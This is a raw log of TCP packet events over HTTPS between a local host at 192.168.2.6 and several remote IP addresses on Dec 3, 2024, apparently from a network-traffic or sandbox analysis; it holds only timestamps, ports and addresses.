                      Dec 3, 2024 17:51:36.388950109 CET4434974320.109.210.53192.168.2.6
                      Dec 3, 2024 17:51:36.388950109 CET49743443192.168.2.620.109.210.53
                      Dec 3, 2024 17:51:36.388999939 CET49743443192.168.2.620.109.210.53
                      Dec 3, 2024 17:51:36.389136076 CET49743443192.168.2.620.109.210.53
                      Dec 3, 2024 17:51:36.389153957 CET4434974320.109.210.53192.168.2.6
                      Dec 3, 2024 17:51:36.389166117 CET49743443192.168.2.620.109.210.53
                      Dec 3, 2024 17:51:36.389175892 CET4434974320.109.210.53192.168.2.6
                      Dec 3, 2024 17:51:37.462460995 CET49719443192.168.2.6142.250.181.100
                      Dec 3, 2024 17:51:37.462492943 CET44349719142.250.181.100192.168.2.6
                      Dec 3, 2024 17:51:37.797836065 CET4434974813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:37.798440933 CET49748443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:37.798466921 CET4434974813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:37.798887014 CET49748443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:37.798892975 CET4434974813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:37.832886934 CET4434974413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:37.833405018 CET49744443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:37.833431005 CET4434974413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:37.833839893 CET49744443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:37.833846092 CET4434974413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:37.834469080 CET4434974713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:37.837779045 CET49747443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:37.837805986 CET4434974713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:37.838201046 CET49747443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:37.838206053 CET4434974713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.032402992 CET4434974613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.033180952 CET49746443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:38.033210039 CET4434974613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.033664942 CET49746443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:38.033673048 CET4434974613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.069314003 CET4434974913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.069925070 CET49749443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:38.069940090 CET4434974913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.070393085 CET49749443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:38.070399046 CET4434974913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.240044117 CET4434974813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.240108013 CET4434974813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.240189075 CET49748443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:38.240596056 CET49748443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:38.240596056 CET49748443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:38.240616083 CET4434974813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.240623951 CET4434974813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.243489027 CET49750443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:38.243520021 CET4434975013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.243604898 CET49750443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:38.243783951 CET49750443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:38.243798018 CET4434975013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.279386044 CET4434974713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.279455900 CET4434974713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.279536009 CET49747443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:38.279752016 CET49747443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:38.279767990 CET4434974713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.279778004 CET49747443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:38.279783010 CET4434974713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.282762051 CET49751443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:38.282792091 CET4434975113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.282890081 CET49751443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:38.283054113 CET49751443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:38.283058882 CET4434975113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.287270069 CET4434974413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.287326097 CET4434974413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.287396908 CET49744443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:38.287491083 CET49744443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:38.287491083 CET49744443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:38.287514925 CET4434974413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.287523985 CET4434974413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.290056944 CET49752443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:38.290080070 CET4434975213.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.290152073 CET49752443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:38.290287018 CET49752443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:38.290297985 CET4434975213.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.490832090 CET4434974613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.490886927 CET4434974613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.490999937 CET49746443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:38.491437912 CET49746443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:38.491437912 CET49746443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:38.491450071 CET4434974613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.491458893 CET4434974613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.494909048 CET49753443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:38.494936943 CET4434975313.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.495006084 CET49753443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:38.495153904 CET49753443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:38.495165110 CET4434975313.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.529102087 CET4434974913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.529161930 CET4434974913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.529213905 CET49749443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:38.529352903 CET49749443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:38.529357910 CET4434974913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.529380083 CET49749443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:38.529383898 CET4434974913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.531971931 CET49754443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:38.531995058 CET4434975413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:38.532073975 CET49754443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:38.532226086 CET49754443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:38.532237053 CET4434975413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.038614988 CET4434975013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.039199114 CET49750443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.039221048 CET4434975013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.039648056 CET49750443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.039654970 CET4434975013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.044998884 CET4434975213.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.045464039 CET49752443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.045484066 CET4434975213.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.045892000 CET49752443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.045897961 CET4434975213.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.089143038 CET4434975113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.089706898 CET49751443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.089739084 CET4434975113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.090265036 CET49751443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.090270042 CET4434975113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.249857903 CET4434975313.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.250812054 CET49753443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.250838041 CET4434975313.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.251192093 CET49753443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.251197100 CET4434975313.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.332283974 CET4434975413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.332950115 CET49754443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.332973957 CET4434975413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.333318949 CET49754443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.333323956 CET4434975413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.396817923 CET44349745191.252.162.52192.168.2.6
                      Dec 3, 2024 17:51:40.397118092 CET49745443192.168.2.6191.252.162.52
                      Dec 3, 2024 17:51:40.397129059 CET44349745191.252.162.52192.168.2.6
                      Dec 3, 2024 17:51:40.398202896 CET44349745191.252.162.52192.168.2.6
                      Dec 3, 2024 17:51:40.398288012 CET49745443192.168.2.6191.252.162.52
                      Dec 3, 2024 17:51:40.399545908 CET49745443192.168.2.6191.252.162.52
                      Dec 3, 2024 17:51:40.399604082 CET44349745191.252.162.52192.168.2.6
                      Dec 3, 2024 17:51:40.399873972 CET49745443192.168.2.6191.252.162.52
                      Dec 3, 2024 17:51:40.399879932 CET44349745191.252.162.52192.168.2.6
                      Dec 3, 2024 17:51:40.443434000 CET49745443192.168.2.6191.252.162.52
                      Dec 3, 2024 17:51:40.476501942 CET4434975013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.476577997 CET4434975013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.476644039 CET49750443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.476862907 CET49750443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.476882935 CET4434975013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.476892948 CET49750443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.476898909 CET4434975013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.479989052 CET49755443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.480029106 CET4434975513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.480113029 CET49755443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.480288029 CET49755443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.480300903 CET4434975513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.483093023 CET4434975213.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.483159065 CET4434975213.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.483207941 CET49752443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.483352900 CET49752443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.483365059 CET4434975213.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.483376980 CET49752443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.483382940 CET4434975213.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.485526085 CET49756443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.485577106 CET4434975613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.485649109 CET49756443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.485799074 CET49756443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.485816002 CET4434975613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.544550896 CET4434975113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.544622898 CET4434975113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.544688940 CET49751443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.544893026 CET49751443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.544920921 CET4434975113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.544935942 CET49751443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.544940948 CET4434975113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.547760010 CET49757443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.547804117 CET4434975713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.547888041 CET49757443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.548054934 CET49757443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.548064947 CET4434975713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.688375950 CET4434975313.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.688438892 CET4434975313.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.688503981 CET49753443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.688718081 CET49753443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.688734055 CET4434975313.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.688745975 CET49753443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.688750982 CET4434975313.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.691683054 CET49758443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.691728115 CET4434975813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.691812038 CET49758443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.691992044 CET49758443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.692009926 CET4434975813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.778424978 CET4434975413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.778491020 CET4434975413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.778544903 CET49754443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.778752089 CET49754443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.778763056 CET4434975413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.778775930 CET49754443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.778779984 CET4434975413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.781759024 CET49759443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.781793118 CET4434975913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:40.781886101 CET49759443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.782058001 CET49759443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:40.782069921 CET4434975913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:41.053843975 CET44349745191.252.162.52192.168.2.6
                      Dec 3, 2024 17:51:41.053957939 CET44349745191.252.162.52192.168.2.6
                      Dec 3, 2024 17:51:41.054022074 CET49745443192.168.2.6191.252.162.52
                      Dec 3, 2024 17:51:41.054502010 CET49745443192.168.2.6191.252.162.52
                      Dec 3, 2024 17:51:41.054516077 CET44349745191.252.162.52192.168.2.6
                      Dec 3, 2024 17:51:41.137778044 CET49760443192.168.2.6191.252.162.52
                      Dec 3, 2024 17:51:41.137816906 CET44349760191.252.162.52192.168.2.6
                      Dec 3, 2024 17:51:41.137871027 CET49760443192.168.2.6191.252.162.52
                      Dec 3, 2024 17:51:41.138098001 CET49760443192.168.2.6191.252.162.52
                      Dec 3, 2024 17:51:41.138109922 CET44349760191.252.162.52192.168.2.6
                      Dec 3, 2024 17:51:41.493114948 CET49761443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:41.493171930 CET44349761164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:41.493246078 CET49761443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:41.493489027 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:41.493546963 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:41.493597984 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:41.493676901 CET49761443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:41.493690968 CET44349761164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:41.493889093 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:41.493907928 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:42.483763933 CET4434975613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:42.484596968 CET49756443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:42.484630108 CET4434975613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:42.485052109 CET49756443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:42.485057116 CET4434975613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:42.494790077 CET49763443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:42.494822025 CET4434976320.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:42.494888067 CET49763443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:42.495543003 CET49763443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:42.495557070 CET4434976320.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:42.522191048 CET4434975713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:42.522717953 CET49757443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:42.522742033 CET4434975713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:42.523178101 CET49757443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:42.523183107 CET4434975713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:42.548532963 CET4434975513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:42.549081087 CET49755443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:42.549103022 CET4434975513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:42.549491882 CET49755443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:42.549495935 CET4434975513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:42.717035055 CET4434975813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:42.717664957 CET49758443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:42.717693090 CET4434975813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:42.718079090 CET49758443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:42.718085051 CET4434975813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:42.808082104 CET44349760191.252.162.52192.168.2.6
                      Dec 3, 2024 17:51:42.810813904 CET49760443192.168.2.6191.252.162.52
                      Dec 3, 2024 17:51:42.810826063 CET44349760191.252.162.52192.168.2.6
                      Dec 3, 2024 17:51:42.811140060 CET44349760191.252.162.52192.168.2.6
                      Dec 3, 2024 17:51:42.811789036 CET49760443192.168.2.6191.252.162.52
                      Dec 3, 2024 17:51:42.811789036 CET49760443192.168.2.6191.252.162.52
                      Dec 3, 2024 17:51:42.811800957 CET44349760191.252.162.52192.168.2.6
                      Dec 3, 2024 17:51:42.811861038 CET44349760191.252.162.52192.168.2.6
                      Dec 3, 2024 17:51:42.866259098 CET49760443192.168.2.6191.252.162.52
                      Dec 3, 2024 17:51:42.937494993 CET4434975613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:42.937566996 CET4434975613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:42.937634945 CET49756443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:42.937829971 CET49756443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:42.937841892 CET4434975613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:42.937855959 CET49756443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:42.937860966 CET4434975613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:42.940828085 CET49764443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:42.940860033 CET4434976413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:42.940949917 CET49764443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:42.941117048 CET49764443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:42.941133022 CET4434976413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:42.972230911 CET4434975713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:42.972287893 CET4434975713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:42.972357035 CET49757443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:42.972516060 CET49757443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:42.972536087 CET4434975713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:42.972548962 CET49757443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:42.972553015 CET4434975713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:42.974946022 CET49765443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:42.974972963 CET4434976513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:42.975045919 CET49765443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:42.975212097 CET49765443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:42.975220919 CET4434976513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:42.997361898 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:42.997673035 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:42.997689962 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:42.998575926 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:42.998656034 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:42.999808073 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:42.999866962 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:43.000175953 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:43.000185966 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:43.002538919 CET44349761164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:43.002722979 CET49761443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:43.002733946 CET44349761164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:43.003118038 CET4434975913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:43.003464937 CET49759443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:43.003484011 CET4434975913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:43.003798008 CET44349761164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:43.003845930 CET49761443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:43.004210949 CET49761443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:43.004272938 CET44349761164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:43.004439116 CET49759443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:43.004443884 CET4434975913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:43.006861925 CET4434975513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:43.006913900 CET4434975513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:43.006962061 CET49755443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:43.007075071 CET49755443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:43.007086992 CET4434975513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:43.007101059 CET49755443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:43.007105112 CET4434975513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:43.009694099 CET49766443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:43.009721041 CET4434976613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:43.009793043 CET49766443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:43.009907007 CET49766443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:43.009921074 CET4434976613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:43.053345919 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:43.053349972 CET49761443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:43.053363085 CET44349761164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:43.101295948 CET49761443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:43.159643888 CET4434975813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:43.159698009 CET4434975813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:43.159758091 CET49758443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:43.160135984 CET49758443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:43.160152912 CET4434975813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:43.160164118 CET49758443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:43.160168886 CET4434975813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:43.292437077 CET49767443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:43.292474031 CET4434976713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:43.292546034 CET49767443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:43.302095890 CET49767443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:43.302109957 CET4434976713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:43.469079018 CET44349760191.252.162.52192.168.2.6
                      Dec 3, 2024 17:51:43.469172001 CET44349760191.252.162.52192.168.2.6
                      Dec 3, 2024 17:51:43.469228029 CET49760443192.168.2.6191.252.162.52
                      Dec 3, 2024 17:51:43.473978043 CET4434975913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:43.474050999 CET4434975913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:43.474101067 CET49759443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:43.475919962 CET49759443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:43.475936890 CET4434975913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:43.475950003 CET49759443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:43.475955009 CET4434975913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:43.480500937 CET49760443192.168.2.6191.252.162.52
                      Dec 3, 2024 17:51:43.480518103 CET44349760191.252.162.52192.168.2.6
                      Dec 3, 2024 17:51:43.486116886 CET49768443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:43.486141920 CET4434976813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:43.486197948 CET49768443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:43.486964941 CET49768443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:43.486975908 CET4434976813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:43.941735983 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:43.941761971 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:43.941770077 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:43.941800117 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:43.941811085 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:43.941822052 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:43.941828966 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:43.941860914 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:43.941874027 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:43.941926956 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:43.977787018 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:43.977838993 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:43.977907896 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:43.977926970 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:43.977938890 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:44.028146982 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:44.028862000 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:44.028876066 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:44.028909922 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:44.028944016 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:44.028948069 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:44.028966904 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:44.029020071 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:44.029038906 CET49762443192.168.2.6164.92.191.86
                      Dec 3, 2024 17:51:44.166183949 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:44.166213036 CET44349762164.92.191.86192.168.2.6
                      Dec 3, 2024 17:51:44.166265011 CET49762443192.168.2.6164.92.191.86
